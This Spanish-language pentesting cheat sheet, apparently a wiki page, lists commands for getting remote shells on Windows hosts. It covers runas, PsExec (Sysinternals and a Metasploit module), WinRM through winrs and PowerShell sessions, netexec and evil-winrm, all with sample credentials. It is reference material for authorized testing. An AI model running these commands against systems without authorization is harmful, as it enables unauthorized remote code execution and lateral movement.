Conexión remota

Windows

Runas

runas /user:xtormincorp\usuario powershell.exe

Para comprobar el acceso con el usuario no servirá whoami, en vez de ello sería mejor usar:

nltest /dsgetdc:xtormincorp.local

PSExec

Puerto

445/tcp (SMB)

Grupo requerido

Administradores

Herramienta de Sysinternals:

https://learn.microsoft.com/es-es/sysinternals/downloads/psexec

psexec64.exe \\MACHINE_IP -u Administrator -p <password> -i cmd.exe

Metasploit:

use exploit/windows/smb/psexec
set RHOSTS file:/home/kali/scope.txt
set smbuser xtormin
set smbpass password123
exploit
psexec -i -s powershell.exe # Ejecución de consola interactiva con el usuario actual

WinRM

Puerto

5985/tcp (WinRM HTTP)

5986/tcp (WinRM HTTPS)

Grupo requerido

Remote Management Users

CMD:

winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

PowerShell:

Primero se debe crear un objeto PSCredential con las credenciales del usuario:

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
  • Crear sesión activa:

Enter-PSSession -Computername TARGET -Credential $credential
  • Ejecutar ScriptBlocks vía WinRM:

Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

Netexec

IP='10.10.10.100'
USER='xtormin'
PASS='password123'
netexec winrm $IP -u $USER -p $PASS

Linux

evil-winrm -i 192.168.1.100 -u <usuario> -p <contraseña>

Última actualización

¿Te fue útil?